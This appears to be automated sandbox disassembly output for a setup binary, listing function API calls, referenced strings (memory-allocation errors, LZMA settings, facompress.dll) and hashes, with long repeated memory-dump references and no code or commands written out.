                                                                                                    • Opcode ID: 65652b8afde157f812c6c2e79bdf3d0b65b3659cd9a082886c18aa1794176e44
                                                                                                    • Instruction ID: 3bc58fe17ec756eebc02230d0b824b689fdfd0e5eeefc047bfb2ee0fafc12855
                                                                                                    • Opcode Fuzzy Hash: 65652b8afde157f812c6c2e79bdf3d0b65b3659cd9a082886c18aa1794176e44
                                                                                                    • Instruction Fuzzy Hash: B451BC716243078FD720DF28C4D476BB3E1AF85314F044A69E8A5DB351D330ECAAAB92
                                                                                                    APIs
                                                                                                    • malloc.MSVCRT ref: 001F06CC
                                                                                                    • longjmp.MSVCRT(?,?,00000000,00000000,001F1393,?,?,00000000,001ED421), ref: 001F06F3
                                                                                                    • exit.MSVCRT ref: 001F0742
                                                                                                    • EnterCriticalSection.KERNEL32 ref: 001F0779
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterSectionexitlongjmpmalloc
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes$seek_output$write
                                                                                                    • API String ID: 2473507763-2590168287
                                                                                                    • Opcode ID: fe743c7c5db289c3a6cbc0ae9fab100fa23200c6095110b36c6b1a299bedc9ed
                                                                                                    • Instruction ID: 2c54688f663e419891aa774372068401607f025485a2b19fb936cfaef196325a
                                                                                                    • Opcode Fuzzy Hash: fe743c7c5db289c3a6cbc0ae9fab100fa23200c6095110b36c6b1a299bedc9ed
                                                                                                    • Instruction Fuzzy Hash: 80E108B4908705DFDB41DF29C48465ABBE0FF88354F118A6DE9988B356E374E980CF82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_stricmpexitlongjmpmallocmemcpystrchr
                                                                                                    • String ID: $$arcdatafile$$.tmp$$$arcpackedfile$$.tmp$,
                                                                                                    • API String ID: 363984579-3666042910
                                                                                                    • Opcode ID: a22750a004beeed42c4bd0b22aeb3ccb5df5e0c7f9e73ae17f923e6ad2548180
                                                                                                    • Instruction ID: 80812dec64e1e522d1acea5934a0883e011f0c1dc003076fc44668ba302d88e3
                                                                                                    • Opcode Fuzzy Hash: a22750a004beeed42c4bd0b22aeb3ccb5df5e0c7f9e73ae17f923e6ad2548180
                                                                                                    • Instruction Fuzzy Hash: 64516DB1908B488FDB11DF28C48836EBBE0BF85314F41896DE988AB281D7759949CF52
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • VirtualQuery failed for %d bytes at address %p, xrefs: 0025C807
                                                                                                    • Address %p has no image-section, xrefs: 0025C81B
                                                                                                    • VirtualProtect failed with code 0x%x, xrefs: 0025C7D6
                                                                                                    • Mingw-w64 runtime failure:, xrefs: 0025C698
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryVirtualabortfwritevfprintf
                                                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                    • API String ID: 2513968241-1534286854
                                                                                                    • Opcode ID: ae2fc219b394b3442647951b91b257d09d9de4ac40177181a3c92e09ef4903c0
                                                                                                    • Instruction ID: 9d218dce86e371c7b0c5d52ec079117c5e131be9d492851f0cc1c3abaee7de5d
                                                                                                    • Opcode Fuzzy Hash: ae2fc219b394b3442647951b91b257d09d9de4ac40177181a3c92e09ef4903c0
                                                                                                    • Instruction Fuzzy Hash: 33519BB69153019FD710EF28D88561AFBE4FF88315F51C92DE8889B216E730E818CF96
                                                                                                    APIs
                                                                                                    • calloc.MSVCRT ref: 00274B22
                                                                                                    • CreateSemaphoreA.KERNEL32 ref: 00274B78
                                                                                                    • CreateSemaphoreA.KERNEL32 ref: 00274B9F
                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 00274BBE
                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 00274BC9
                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 00274BD4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection$CreateSemaphore$calloc
                                                                                                    • String ID: l
                                                                                                    • API String ID: 2075313795-2517025534
                                                                                                    • Opcode ID: 527470cc24e9005c66b042b7d906e8cb757ec133d2a5dce08452e87d41cd7c2f
                                                                                                    • Instruction ID: 2f224a5e462e3d0b6e851618bb459ecf97c86bef08d75d1c020b3f0a82a8237b
                                                                                                    • Opcode Fuzzy Hash: 527470cc24e9005c66b042b7d906e8cb757ec133d2a5dce08452e87d41cd7c2f
                                                                                                    • Instruction Fuzzy Hash: 28313CB15153018FEB10BF29E58835ABBE4EF40314F158A6DD8988B395E779D858CF82
                                                                                                    APIs
                                                                                                    • _close.MSVCRT ref: 0028728E
                                                                                                    • malloc.MSVCRT ref: 002872AB
                                                                                                    • exit.MSVCRT ref: 00287302
                                                                                                    • malloc.MSVCRT ref: 002872BD
                                                                                                      • Part of subcall function 001EE7F0: malloc.MSVCRT ref: 001EE800
                                                                                                      • Part of subcall function 001EE7F0: CharToOemW.USER32 ref: 001EE822
                                                                                                      • Part of subcall function 001EE7F0: free.MSVCRT ref: 001EE82E
                                                                                                    • longjmp.MSVCRT(?,?,?,?,?,?,00000000,00000000,?,?,0020F48A), ref: 0028732F
                                                                                                    • exit.MSVCRT ref: 00287391
                                                                                                    • _waccess.MSVCRT ref: 002873B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$exit$Char_close_waccessfreelongjmp
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes$ERROR: can't close file %s
                                                                                                    • API String ID: 2206358687-2669338241
                                                                                                    • Opcode ID: f21b90d8b372b2a9c673a5527f0dc0bfe7ffc1922a4e7d02aea822925015cd15
                                                                                                    • Instruction ID: 36021dc32e257a4066141170887afbd7763a6da6d900ca11187696370f2af7dd
                                                                                                    • Opcode Fuzzy Hash: f21b90d8b372b2a9c673a5527f0dc0bfe7ffc1922a4e7d02aea822925015cd15
                                                                                                    • Instruction Fuzzy Hash: C33137B46297049BC310BF39D54631EBBE4BF44741F95886DE8CC9B242DBB8C8509B97
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ActiveExecuteInitializeShellWindow$CloseHandleObjectSingleWait
                                                                                                    • String ID: <$@
                                                                                                    • API String ID: 2501244953-1426351568
                                                                                                    • Opcode ID: f0891f29c3940f342ed2c1153644b7b686ae603553caca6a8fc9daf090585ab7
                                                                                                    • Instruction ID: 95e1d6caac4b798f4a4130055761ef5e53a7e6500c659615ed4a5c6c2b0678f0
                                                                                                    • Opcode Fuzzy Hash: f0891f29c3940f342ed2c1153644b7b686ae603553caca6a8fc9daf090585ab7
                                                                                                    • Instruction Fuzzy Hash: E021CEB15083018FD310EF68EA8870EBBF1BB85705F014A2DE89997341EB75D5498B96
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 001F2252
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,00000000,001F2794,?,?,00000000,?,00000000,001F28AF), ref: 001F229F
                                                                                                    • wcsrchr.MSVCRT ref: 001F22B3
                                                                                                    • wcscpy.MSVCRT ref: 001F22C6
                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,00000000,001F28AF), ref: 001F22D4
                                                                                                    • wcscpy.MSVCRT ref: 001F22E9
                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,001F28AF), ref: 001F22F1
                                                                                                    • GetProcAddress.KERNEL32 ref: 001F230C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProcwcscpy$FileModuleNamewcsrchr
                                                                                                    • String ID: \$facompress.dll$facompress_mt.dll
                                                                                                    • API String ID: 3125217424-1939784871
                                                                                                    • Opcode ID: 716b93104175b4028e1245a28763cced54df2f4ef26dc0485e21ecff4b688ed7
                                                                                                    • Instruction ID: 96137e5f454bf5c66056b58488ee26b39b16f12e19eb7cbb367012650648c1ff
                                                                                                    • Opcode Fuzzy Hash: 716b93104175b4028e1245a28763cced54df2f4ef26dc0485e21ecff4b688ed7
                                                                                                    • Instruction Fuzzy Hash: 831103B59097088BD700EF34EA8526ABBF0BB84348F01993DE98987316D778A4599B46
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$realloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347955621-0
                                                                                                    • Opcode ID: c0796f6711784f4569e8bf613fe5e496ee828f27997d8107ec6bb06479017792
                                                                                                    • Instruction ID: 038e4f7ab1bbb366ec36337b693a912ca74f472480d254f2911c489dc6828832
                                                                                                    • Opcode Fuzzy Hash: c0796f6711784f4569e8bf613fe5e496ee828f27997d8107ec6bb06479017792
                                                                                                    • Instruction Fuzzy Hash: 3161F6B5528301DFC714EF2AD48165ABBE0BF85300F95882EF9858B311E774E959DF82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: tolower
                                                                                                    • String ID: %s:%s$:lc%d$:lp%d$:mc%d$:pb%d$a%d$fast$lzma:%s%s%s:%s:%d%s%s%s%s$max$normal
                                                                                                    • API String ID: 3025214199-117223130
                                                                                                    • Opcode ID: c7eb5566bc3e3cbf56bf27671e25cd8a35770a87f818b7f896f59b1b5141653e
                                                                                                    • Instruction ID: 1982b308ab3aea115634da84e27ffaa6ed9aca707bb08bd4d88a3d3029eeea3b
                                                                                                    • Opcode Fuzzy Hash: c7eb5566bc3e3cbf56bf27671e25cd8a35770a87f818b7f896f59b1b5141653e
                                                                                                    • Instruction Fuzzy Hash: 1751F8B85097449BCB55DF24C5805AABBE5BFC8740F51C83EE88887315E731D9458B82
                                                                                                    APIs
                                                                                                    • MonitorFromWindow.USER32 ref: 001CE439
                                                                                                    • malloc.MSVCRT ref: 001CE5C4
                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,-00000010,00000001,0139290C), ref: 001CE767
                                                                                                    • GetProcAddress.KERNEL32 ref: 001CE77F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
